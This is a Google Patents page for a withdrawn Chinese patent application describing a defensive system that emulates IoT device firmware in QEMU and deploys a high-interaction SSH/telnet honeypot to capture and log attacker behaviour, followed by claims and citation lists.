CN112417444A - Attack trapping system based on firmware simulation - Google Patents

Attack trapping system based on firmware simulation Download PDF

Info

Publication number
CN112417444A
CN112417444A CN202011393227.9A CN202011393227A CN112417444A CN 112417444 A CN112417444 A CN 112417444A CN 202011393227 A CN202011393227 A CN 202011393227A CN 112417444 A CN112417444 A CN 112417444A
Authority
CN
China
Prior art keywords
firmware
equipment
attack
information
simulation
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Withdrawn
Application number
CN202011393227.9A
Other languages
Chinese (zh)
Inventor
陈霄
肖甫
沙乐天
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Nanjing University of Posts and Telecommunications
Original Assignee
Nanjing University of Posts and Telecommunications
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Nanjing University of Posts and Telecommunications filed Critical Nanjing University of Posts and Telecommunications
Priority to CN202011393227.9A priority Critical patent/CN112417444A/en
Publication of CN112417444A publication Critical patent/CN112417444A/en
Withdrawn legal-status Critical Current

Links

Images

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/57Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/577Assessing vulnerabilities and evaluating computer system security

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Computing Systems (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention relates to an attack trapping system based on firmware simulation, which comprises the following steps: (1) acquiring and analyzing firmware; (2) simulating the firmware information acquired in the step 1 by using a QEMU simulator through a system level simulation technology (3) on the basis of the step 2, building a honeypot system, deploying a high-interaction honeypot system based on an SSH (secure Shell) agent protocol in a virtualization environment, and configuring information; (4) and (3) on the basis of the step (3), carrying out attack behavior capture, carrying out real-time monitoring on various attack behavior characteristics of the equipment in the honeypot, and capturing information such as an attack launching way of an attacker. According to the invention, simulation and simulation are carried out on the firmware through the QEMU simulator, and the SSH protocol-based honeypot environment is deployed by using a virtualization technology, so that various attack behaviors aiming at equipment can be effectively monitored in real time, malicious attacks are captured, and a more efficient and complete system safety protection system is constructed.

Description

Attack trapping system based on firmware simulation
Technical Field
The invention belongs to the technical field of computer security, particularly relates to computer equipment firmware, an emulation simulator and honeypot technology, and particularly relates to an attack trapping system based on firmware simulation.
Background
With the rapid development of the internet of things and the wide popularization of embedded devices, more and more embedded devices are connected through a network, and a user can control any embedded device connected to the network at any place through mobile devices such as a mobile phone and a PC (personal computer), for example, people can monitor any abnormal condition at home at any time by connecting a mobile phone with a network camera in an office to observe whether electrical appliances at home are closed or not and whether thieves steal in the office or not. The embedded device has various processor architectures and functions, which results in complex security analysis steps and strict requirements on professional knowledge for the embedded device, and the security awareness of people is still weak, so the security research development of the embedded device is slow at present.
The security problem of the embedded internet of things equipment needs to be paid sufficient attention, the embedded internet of things equipment in multiple regions of the United states in 2016 and 9 months is subjected to large-scale DDoS attack, the attack is caused by botnet network virus named Mirai, the Mirai can infect embedded equipment such as network cameras, routers and wireless printers, invasion and control are carried out by utilizing a plurality of known and undisclosed vulnerabilities, then other embedded equipment is infected through the Internet, and hundreds of thousands of embedded equipment are controlled to execute distributed blocking service attack, namely DDoS attack, when the virus outbreak peak. Many of the official websites of the united states of america, including Amazon, Spotify, Twitter, etc., are attacked by the virus and the pages are rendered inaccessible. Dyn companies that provide domain name access to these internet enterprises also suffer large-scale DDoS attacks in month 10, resulting in multiple websites and online services being inaccessible, which attacks are also known as "east disconnect events". In 2017, 5 months, a novel fannacry virus was outbreak worldwide. The virus attacks by means of a 445 port which is opened by default in a Windows system by means of high-risk vulnerability 'eternal blue', and performs self-replication and self-propagation by scanning ports of other machines in the same network segment. Spread rapidly in a short period of time, resulting in hundreds of countries with at least 30 million machines infected, with losses amounting to $ 80 million. In 2018, in 5 months, a Cisco security team discloses a highly-extensible and highly-destructive malicious software VPNFilter, which can burn out equipment to cover the trace of the equipment and monitor the flow of the equipment to steal user information. The types of devices attacked by the method are mostly network devices and storage devices which are networked, and according to statistics, the VPNFlite has infected 50 internet of things devices in total in at least 50 countries.
From the influence range and the occurrence frequency of the major vulnerability attack events, the reverse engineering and vulnerability analysis of the Internet of things equipment are accelerated, the transformation and upgrading of the traditional industry are facilitated, the development of the global Internet of things is promoted, and the method has great significance in aspects of national information safety, network data protection, personal information guarantee and the like.
There are many online device scanning services, such as Shodan, Censys, etc., that can scan all online devices on the internet and provide device details obtained by the scanning. Such an easy-to-use research tool enables security researchers to more efficiently and quickly identify embedded internet of things devices that may be exposed or available. However, the disadvantage of such full network scanning is that vulnerability scanning can only be performed for ports opened by embedded devices, and vulnerability analysis cannot be performed on devices if they do not have opened ports or are not networked at all. Because the embedded internet of things equipment has various types and functions and various security vulnerabilities exist in firmware, security research on the embedded equipment is very difficult, and the embedded equipment is subject to larger attack surface and higher frequency. Each equipment manufacturer is not active in safety detection and updating of firmware, a user cannot actively upgrade the firmware after purchasing the equipment, and once a certain embedded equipment firmware finds a bug, the safety of millions or even millions of users can be affected.
The attack suffered by the embedded internet of things equipment not only damages the safety of the equipment, but also threatens the stability of the whole computer system, so that the internal structure and the operation principle of the internet of things equipment need to be further researched, starting with the firmware of the equipment, the state of the equipment facing various attack behaviors is researched, malicious attack is captured, the attack path is analyzed, and the safety and the stability of the whole computer system are further maintained.
Disclosure of Invention
Aiming at the problem of system safety which continuously appears in recent years, the invention provides an attack trapping system based on firmware simulation, the characteristic information of firmware is analyzed by acquiring equipment firmware and combining static analysis and dynamic analysis, a QEMU simulator is used for simulating the environment required by target firmware, a honeypot system is deployed in a virtualized environment, real-time and effective monitoring and capturing are carried out on attack behaviors, the capability of the system for defending various attack behaviors is improved, and a safer and more reliable system safety protection system is constructed.
In order to achieve the purpose, the invention is realized by the following technical scheme:
the invention relates to an attack trapping system based on firmware simulation, which traps attack behaviors from the perspective of firmware simulation and comprises the following steps:
step 1: acquiring and analyzing firmware, acquiring firmware information on an equipment official network or directly reading a firmware storage chip through hardware access, bypassing a control equipment controller or a processor, directly controlling a Flash chip of equipment, reading the whole content in the chip, and analyzing binary data of the firmware;
step 2: simulating the target firmware by using a QEMU simulator and a system level simulation technology for the firmware information acquired in the step 1;
and step 3: on the basis of the step 2, constructing a honeypot system, deploying a high-interaction honeypot system based on an SSH (secure Shell) agent protocol in a virtualized environment, and configuring information;
and 4, step 4: and (3) on the basis of the step (3), carrying out attack behavior capture, carrying out real-time monitoring on various attack behavior characteristics of the equipment in the honeypot, and capturing information such as an attack launching way of an attacker.
The invention is further improved in that: in step 1, firmware is acquired and analyzed, firmware information is acquired on an equipment official network, or a firmware storage chip is directly read through hardware access, a Flash chip of the equipment is directly controlled by bypassing a control equipment controller (or a processor), the whole content in the chip is read, and binary data of the firmware is analyzed, specifically:
(1) firmware acquisition: downloading a firmware compression package on an official website provided by an equipment manufacturer by using a webpage crawler, selecting a mode of directly reading a firmware storage chip through hardware access for a firmware which does not provide a downloaded webpage, bypassing a control equipment controller, directly controlling a Flash chip of equipment, and reading the whole content in the chip; integrating and classifying all the collected firmware information, and performing folder-based induction according to information such as equipment brands, equipment types and equipment models, so as to facilitate later-stage unified management;
(2) firmware analysis: the embedded device firmware refers to a section of binary program stored in an EEPROM or FLASH chip, and the firmware includes all executable programs and configuration files in the embedded device, and is the most core part of the embedded device, and determines the functions and performance of the device, so the firmware is software, not hardware. The following results are obtained through the analysis of a large amount of embedded equipment firmware: the embedded equipment firmware mainly comprises four parts, namely Header information (Header), a boot loader (BootLoader), a kernel Image (Image) and a Root file system (Root file system), wherein the Header information of the firmware is analyzed, the data structure of the whole firmware is known through the format of the Header information, a corresponding characteristic value database is established through analyzing characteristic fields of various types of firmware, after binary data of the embedded internet of things equipment firmware is analyzed, the corresponding characteristic field is searched according to the Header information and offset, the basic information of the firmware is identified, after firmware images under the architectures of a plurality of manufacturers and a plurality of processors are analyzed, the firmware is decompressed and decompiled, the binary data is checked, characteristic values are generated according to the offset and the field size of the characteristic field, and then a third firmware analysis tool Binwalk is used for carrying out preliminary analysis on the type of the firmware, and classifying and storing the firmware into a database according to the system architecture and the file format of the firmware operation, and finally establishing a complete firmware characteristic value data table of the embedded Internet of things equipment.
The invention is further improved in that: in step 2, the target firmware is simulated by using a QEMU simulator and a system level simulation technology on the firmware information obtained in step 1, specifically:
step 2-1: carrying out more detailed research on the embedded internet of things equipment firmware characteristic value data table collected and integrated in the step 1; comparing the advantages and the disadvantages of application program level simulation, process level simulation and system level simulation used in the prior dynamic simulation technology, selecting the system level simulation as the simulation environment of a firmware dynamic analysis platform according to a characteristic value data table of firmware, simulating all interfaces of hardware equipment, and rapidly simulating a real firmware operation environment;
step 2-2: installing a QEMU simulator on a host, selecting related components suitable for firmware versions, setting related parameters of the simulator, and simply testing by using certain firmware information to ensure the normal operation of the simulator;
step 2-3: and (3) mounting the root file system extracted from the firmware, then carrying out full-system dynamic simulation on the kernel by using QEMU, scanning and tracking the system configuration file in the simulation process, deducing and adjusting the network configuration parameters of the firmware environment.
The invention is further improved in that: in step 3, on the basis of step 2, a honeypot system is built, a high-interaction honeypot system based on an SSH agent protocol is deployed in a virtualized environment, information configuration is performed, and a high-interaction honeypot system is built based on the SSH agent protocol in the virtualized environment, specifically:
(3-1) creating a user, confirming all information and confirming a password;
(3-2) configuring the honeypots correspondingly by changing the configuration files;
(3-3) creating a false file system with the functions of adding and deleting files, wherein the false file system comprises a complete firmware file system, so that the possibility of adding and deleting false files in the false file system is given to an attacker, and meanwhile, some existing bugs are added in the device firmware to trap the attacker. The system supports ssh, telnet proxies and monitors when an attacker makes access.
The invention is further improved in that: in step 4, on the basis of step 3, performing attack behavior capture, performing real-time monitoring on various attack behavior characteristics of the equipment in the honeypot, and capturing information such as an attack launching way of an attacker, specifically:
step 4-1: collecting vulnerability information of the Internet of things equipment of different types and different models through network data or experimental data, establishing a complete vulnerability utilization database, and extracting characteristic information for summarizing vulnerabilities;
step 4-2: monitoring the access flow of equipment in the honeypot in real time, and performing database synchronous comparison on some key data; for a pre-existing known bug, analyzing the equipment condition when the bug is triggered, and matching corresponding attack behaviors in time, when an attacker accesses ssh, once a login event occurs, all operation records of the attacker are recorded in a log system and synchronously recorded in a mysql database, so that the later backtracking is facilitated, in addition, the attack path of the attacker is obtained through related log information in a honeypot, and high interactive operation is carried out in time, so that the concealment and the continuity of the system are ensured;
step 4-3: and (4) analyzing to obtain the attack behaviors suffered by different types and types of equipment and the paths of attackers by combining the analysis results of the step (4-1) and the step (4-2), researching corresponding solutions from the perspective of the system, improving the capability of the system for defending various attack behaviors and constructing a safer and more reliable system safety protection system.
The invention has the beneficial effects that: (1) the method starts from the perspective of equipment firmware, collects, sorts and summarizes the equipment firmware through different firmware searching modes, ensures that the coverage range of the equipment firmware is complete enough, analyzes binary data such as a processor architecture, an instruction set, a file format and the like of the firmware, establishes a firmware characteristic value data table, identifies the system type and the file format in the firmware through the data table, analyzes according to the processor architecture and the data storage mode of the firmware, acquires a kernel and a root file system in the firmware, is closer to the bottom layer of the equipment compared with other modes, can analyze information of each aspect of the equipment in a deeper layer, and accordingly ensures that attack behavior trapping is more efficient and complete; (2) the method adopts the angle of firmware simulation, uses a processor simulator QEMU with comprehensive functions, is transparent to a bottom hardware architecture when the firmware is simulated, namely can support not only an x86 architecture but also equipment simulation of ARM and MIPS architectures, can conveniently carry out cross compiling and dynamic debugging on various equipment, in addition, the QEMU uses a dynamic binary translation technology to carry out dynamic translation on binary instructions of a simulation environment, utilizes a cache technology, repeatedly utilizes the translated instructions, improves the efficiency of QEMU simulation, saves time and energy of safety personnel, is simple and easy to operate, and has better simulation effect and higher efficiency compared with other modes; (3) the method has the advantages that the high-interaction honeypot system is deployed, enough operations are performed on attackers, so that the recordable information is comprehensive enough, the system can hide the self to the maximum extent, the system can perform monitoring and capturing operations persistently, in addition, the honeypot system can record the operation records of the attackers in a log system and a database in real time, and behavior analysis, path retrieval, vulnerability mining and the like in the later period are more efficient.
Drawings
FIG. 1 is an overall flow chart of the present invention.
FIG. 2 is a block diagram of the firmware acquisition and parsing in the present invention.
FIG. 3 is a block diagram of a QEMU-based simulation of firmware in the present invention.
FIG. 4 is a block diagram of the structure of an attack behavior trap in the present invention.
Detailed Description
In the following description, for purposes of explanation, numerous implementation details are set forth in order to provide a thorough understanding of the embodiments of the invention. It should be understood, however, that these implementation details are not to be interpreted as limiting the invention. That is, in some embodiments of the invention, such implementation details are not necessary.
As shown in fig. 1-4, the present invention is an attack trapping system based on firmware simulation, which traps attack behavior from the perspective of firmware simulation, and comprises the following steps:
step 1: firmware is acquired and analyzed, firmware information is acquired on an equipment official network or a firmware storage chip is directly read through hardware access, a Flash chip of the equipment is directly controlled by bypassing a controller or a processor of the control equipment, the whole content in the chip is read, and binary data of the firmware is analyzed, as shown in fig. 2, the method specifically comprises the following steps:
(1) firmware acquisition: downloading a firmware compression package on an official website provided by an equipment manufacturer by using a webpage crawler, selecting a mode of directly reading a firmware storage chip through hardware access for a firmware which does not provide a downloaded webpage, bypassing a control equipment controller, directly controlling a Flash chip of equipment, and reading the whole content in the chip; integrating and classifying all the collected firmware information, and performing folder-based induction according to information such as equipment brands, equipment types and equipment models, so as to facilitate later-stage unified management;
(2) firmware analysis: the embedded device firmware refers to a section of binary program stored in an EEPROM or FLASH chip, and the firmware includes all executable programs and configuration files in the embedded device, and is the most core part of the embedded device, which determines the function and performance of the device. Therefore, the firmware is software, not hardware, and the analysis of a large amount of embedded device firmware yields that: the embedded equipment firmware mainly comprises four parts, namely Header information (Header), a boot loader (BootLoader), a kernel Image (Image) and a Root file system (Root file system), wherein the Header information of the firmware is analyzed, the data structure of the whole firmware is known through the format of the Header information, a corresponding characteristic value database is established through analyzing characteristic fields of various types of firmware, after binary data of the embedded internet of things equipment firmware is analyzed, the corresponding characteristic field is searched according to the Header information and offset, the basic information of the firmware is identified, after firmware images under the architectures of a plurality of manufacturers and a plurality of processors are analyzed, the firmware is decompressed and decompiled, the binary data is checked, characteristic values are generated according to the offset and the field size of the characteristic field, and then a third firmware analysis tool Binwalk is used for carrying out preliminary analysis on the type of the firmware, and classifying and storing the firmware into a database according to the system architecture and the file format of the firmware operation, and finally establishing a complete firmware characteristic value data table of the embedded Internet of things equipment.
Step 2: simulating the target firmware by using a QEMU simulator and through a system level simulation technology on the firmware information acquired in the step 1, as shown in fig. 3, specifically:
step 2-1: carrying out more detailed research on the embedded internet of things equipment firmware characteristic value data table collected and integrated in the step 1; comparing the advantages and the disadvantages of application program level simulation, process level simulation and system level simulation used in the prior dynamic simulation technology, selecting the system level simulation as the simulation environment of a firmware dynamic analysis platform according to a characteristic value data table of firmware, simulating all interfaces of hardware equipment, and rapidly simulating a real firmware operation environment;
step 2-2: installing a QEMU simulator on a host, selecting related components suitable for firmware versions, setting related parameters of the simulator, and simply testing by using certain firmware information to ensure the normal operation of the simulator;
step 2-3: and (3) mounting the root file system extracted from the firmware, then carrying out full-system dynamic simulation on the kernel by using QEMU, scanning and tracking the system configuration file in the simulation process, deducing and adjusting the network configuration parameters of the firmware environment.
And step 3: on the basis of the step 2, constructing a honeypot system, deploying a high-interaction honeypot system based on an SSH (secure Shell) agent protocol in a virtualized environment, and configuring information;
step 3, in the virtualization environment, building a high-interaction honeypot system based on the SSH proxy protocol, specifically:
(3-1) creating a user, confirming all information and confirming a password;
(3-2) configuring the honeypots correspondingly by changing the configuration files;
(3-3) creating a false file system with the functions of adding and deleting files, wherein the false file system comprises a complete firmware file system, so that the possibility of adding and deleting false files in the false file system is given to an attacker, and meanwhile, some existing bugs are added in the device firmware to trap the attacker. The system supports ssh, telnet proxies and monitors when an attacker makes access.
And 4, step 4: on the basis of the step 3, performing attack behavior capture, performing real-time monitoring on various attack behavior characteristics of the equipment in the honeypot, and capturing information such as a path of attack initiation by an attacker, as shown in fig. 4, specifically:
step 4-1: collecting vulnerability information of the Internet of things equipment of different types and different models through network data or experimental data, establishing a complete vulnerability utilization database, and extracting characteristic information for summarizing vulnerabilities;
step 4-2: monitoring the access flow of equipment in the honeypot in real time, and performing database synchronous comparison on some key data; for a pre-existing known bug, analyzing the equipment condition when the bug is triggered, and matching corresponding attack behaviors in time, when an attacker accesses ssh, once a login event occurs, all operation records of the attacker are recorded in a log system and synchronously recorded in a mysql database, so that the later backtracking is facilitated, in addition, the attack path of the attacker is obtained through related log information in a honeypot, and high interactive operation is carried out in time, so that the concealment and the continuity of the system are ensured;
step 4-3: and (4) analyzing to obtain the attack behaviors suffered by different types and types of equipment and the paths of attackers by combining the analysis results of the step (4-1) and the step (4-2), researching corresponding solutions from the perspective of the system, improving the capability of the system for defending various attack behaviors and constructing a safer and more reliable system safety protection system.
The system analyzes the characteristic information of the firmware by acquiring the equipment firmware and combining static analysis and dynamic analysis, simulates the environment required by the target firmware by using the QEMU simulator, effectively monitors and captures the attack behavior in real time by deploying the honeypot system in the virtualized environment, improves the capability of the system in defending various attack behaviors, and constructs a safer and more reliable system safety protection system.
The above description is only an embodiment of the present invention, and is not intended to limit the present invention. Various modifications and alterations to this invention will become apparent to those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the scope of the claims of the present invention.

Claims (5)

1. An attack trapping system based on firmware simulation, which traps attack behaviors from the perspective of firmware simulation, is characterized in that: the system comprises the following steps:
step 1: acquiring and analyzing firmware, acquiring firmware information on an equipment official network or directly reading a firmware storage chip through hardware access, bypassing a control equipment controller, directly controlling a Flash chip of equipment, reading the whole content in the chip and analyzing binary data of the firmware;
step 2: simulating the target firmware by using a QEMU simulator and a system level simulation technology for the firmware information acquired in the step 1;
and step 3: on the basis of the step 2, constructing a honeypot system, deploying a high-interaction honeypot system based on an SSH (secure Shell) agent protocol in a virtualized environment, and configuring information;
and 4, step 4: and (3) on the basis of the step (3), carrying out attack behavior capture, carrying out real-time monitoring on various attack behavior characteristics of the equipment in the honeypot, and capturing information such as an attack launching way of an attacker.
2. The attack trapping system according to claim 1, wherein: the step 1 specifically comprises the following steps:
(1) firmware acquisition: downloading a firmware compression package on an official website provided by an equipment manufacturer by using a webpage crawler, selecting a mode of directly reading a firmware storage chip through hardware access for a firmware which does not provide a downloaded webpage, bypassing a control equipment controller, directly controlling a Flash chip of equipment, and reading the whole content in the chip;
(2) firmware analysis: analyzing the header information of the firmware, knowing the data structure of the whole firmware through the format of the header information, by analyzing the characteristic fields of various types of firmware, a corresponding characteristic value database is established, after binary data of the firmware of the embedded Internet of things equipment is analyzed, finding corresponding characteristic fields according to the header information and the offset, identifying basic information of the firmware, after analyzing the firmware image under the architectures of a plurality of manufacturers and a plurality of processors, decompressing and decompiling the firmware, checking binary data of the firmware, generating a characteristic value according to the offset and the field size of the characteristic field, then, a third-party firmware analysis tool Binwalk is utilized to perform preliminary analysis on the firmware types, and classifying and storing the firmware into a database according to the system architecture and the file format of the firmware operation, and finally establishing a complete firmware characteristic value data table of the embedded Internet of things equipment.
3. The attack trapping system according to claim 1, wherein: the step 2 specifically comprises the following steps:
step 2-1: carrying out more detailed research on the embedded internet of things equipment firmware characteristic value data table collected and integrated in the step 1;
step 2-2: installing a QEMU simulator on a host, selecting related components suitable for firmware versions, setting related parameters of the simulator, and simply testing by using certain firmware information to ensure the normal operation of the simulator;
step 2-3: and mounting the root file system extracted from the firmware, and then performing full-system dynamic simulation on the kernel by using QEMU.
4. The attack trapping system according to claim 1, wherein: step 3, in the virtualization environment, building a high-interaction honeypot system based on the SSH proxy protocol, specifically:
(3-1) creating a user, confirming all information and confirming a password;
(3-2) configuring the honeypots correspondingly by changing the configuration files;
(3-3) creating a false file system with the functions of adding and deleting files, wherein the false file system comprises a complete firmware file system, and the possibility of adding and deleting false files in the false file system is given to an attacker.
5. The attack trapping system according to claim 1, wherein: the step 4 specifically comprises the following steps:
step 4-1: collecting vulnerability information of the Internet of things equipment of different types and different models through network data or experimental data, establishing a complete vulnerability utilization database, and extracting characteristic information for summarizing vulnerabilities;
step 4-2: monitoring the access flow of equipment in the honeypot in real time, and performing database synchronous comparison on some key data;
step 4-3: and (4) analyzing to obtain the attack behaviors suffered by different types and types of equipment and the paths of attackers by combining the analysis results of the step (4-1) and the step (4-2), researching corresponding solutions from the perspective of the system, improving the capability of the system for defending various attack behaviors and constructing a safer and more reliable system safety protection system.
CN202011393227.9A 2020-12-03 2020-12-03 Attack trapping system based on firmware simulation Withdrawn CN112417444A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202011393227.9A CN112417444A (en) 2020-12-03 2020-12-03 Attack trapping system based on firmware simulation

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202011393227.9A CN112417444A (en) 2020-12-03 2020-12-03 Attack trapping system based on firmware simulation

Publications (1)

Publication Number Publication Date
CN112417444A true CN112417444A (en) 2021-02-26

Family

ID=74829800

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202011393227.9A Withdrawn CN112417444A (en) 2020-12-03 2020-12-03 Attack trapping system based on firmware simulation

Country Status (1)

Country Link
CN (1) CN112417444A (en)

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113703920A (en) * 2021-08-27 2021-11-26 烽火通信科技股份有限公司 Hardware simulation method and platform
CN113965409A (en) * 2021-11-15 2022-01-21 北京天融信网络安全技术有限公司 Network trapping method and device, electronic equipment and storage medium
CN114157450A (en) * 2021-11-04 2022-03-08 南方电网深圳数字电网研究院有限公司 Internet of things honeypot-based network attack induction method and device
CN114756871A (en) * 2022-04-22 2022-07-15 Oppo广东移动通信有限公司 Vulnerability detection method and device, electronic equipment and storage medium
CN114826996A (en) * 2022-05-10 2022-07-29 上海磐御网络科技有限公司 Router honeypot testing method and device based on busy file system
CN114884717A (en) * 2022-04-28 2022-08-09 浙江大学 User data deep evidence obtaining analysis method and system for Internet of things equipment
CN115664855A (en) * 2022-12-22 2023-01-31 北京市大数据中心 Network attack defense method, electronic equipment and computer readable medium
CN116502226A (en) * 2023-06-27 2023-07-28 浙江大学 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Cited By (12)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113703920A (en) * 2021-08-27 2021-11-26 烽火通信科技股份有限公司 Hardware simulation method and platform
CN113703920B (en) * 2021-08-27 2023-08-08 烽火通信科技股份有限公司 Hardware simulation method and platform
CN114157450A (en) * 2021-11-04 2022-03-08 南方电网深圳数字电网研究院有限公司 Internet of things honeypot-based network attack induction method and device
CN114157450B (en) * 2021-11-04 2024-03-15 南方电网数字平台科技(广东)有限公司 Internet of things honeypot-based network attack induction method and device
CN113965409A (en) * 2021-11-15 2022-01-21 北京天融信网络安全技术有限公司 Network trapping method and device, electronic equipment and storage medium
CN114756871A (en) * 2022-04-22 2022-07-15 Oppo广东移动通信有限公司 Vulnerability detection method and device, electronic equipment and storage medium
CN114884717A (en) * 2022-04-28 2022-08-09 浙江大学 User data deep evidence obtaining analysis method and system for Internet of things equipment
CN114884717B (en) * 2022-04-28 2023-08-25 浙江大学 User data deep evidence collection analysis method and system for Internet of things equipment
CN114826996A (en) * 2022-05-10 2022-07-29 上海磐御网络科技有限公司 Router honeypot testing method and device based on busy file system
CN115664855A (en) * 2022-12-22 2023-01-31 北京市大数据中心 Network attack defense method, electronic equipment and computer readable medium
CN116502226A (en) * 2023-06-27 2023-07-28 浙江大学 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system
CN116502226B (en) * 2023-06-27 2023-09-08 浙江大学 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Similar Documents

Publication Publication Date Title
CN112417444A (en) Attack trapping system based on firmware simulation
Dang et al. Understanding fileless attacks on linux-based iot devices with honeycloud
Lashkari et al. Toward developing a systematic approach to generate benchmark android malware datasets and classification
Zhang et al. An IoT honeynet based on multiport honeypots for capturing IoT attacks
Antonakakis et al. Understanding the mirai botnet
Wang et al. IoTCMal: Towards a hybrid IoT honeypot for capturing and analyzing malware
US10586045B2 (en) System and method for detecting malware in mobile device software applications
WO2017071148A1 (en) Cloud computing platform-based intelligent defense system
Trajanovski et al. An automated and comprehensive framework for IoT botnet detection and analysis (IoT-BDA)
Riccardi et al. A framework for financial botnet analysis
Sentanoe et al. Virtual machine introspection based SSH honeypot
CN115208634A (en) Supervision engine of network assets
CN112398829A (en) Network attack simulation method and system for power system
KR101431192B1 (en) Method for Rooting Attack Events Detection on Mobile Device
CN113382006B (en) Internet of things terminal security and risk assessment and evaluation method
Ahmed et al. Identifying mirai-exploitable vulnerabilities in iot firmware through static analysis
Kaur et al. Hybrid real-time zero-day malware analysis and reporting system
JP2017224150A (en) Analyzer, analysis method, and analysis program
Nazario Botnet tracking: Tools, techniques, and lessons learned
Romana et al. Security analysis of SOHO Wi-Fi routers
CN116502226B (en) Firmware simulation-based high-interaction Internet of things honeypot deployment method and system
Aprilliansyah et al. Analysis of Remote Access Trojan Attack using Android Debug Bridge
Fakiha The Role of Raspberry Pi in Forensic Computer Crimes
Li et al. Automatic Detection and Analysis towards Malicious Behavior in IoT Malware
Furfaro et al. Gathering Malware Data through High-Interaction Honeypots.

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
WW01 Invention patent application withdrawn after publication

Application publication date: 20210226

WW01 Invention patent application withdrawn after publication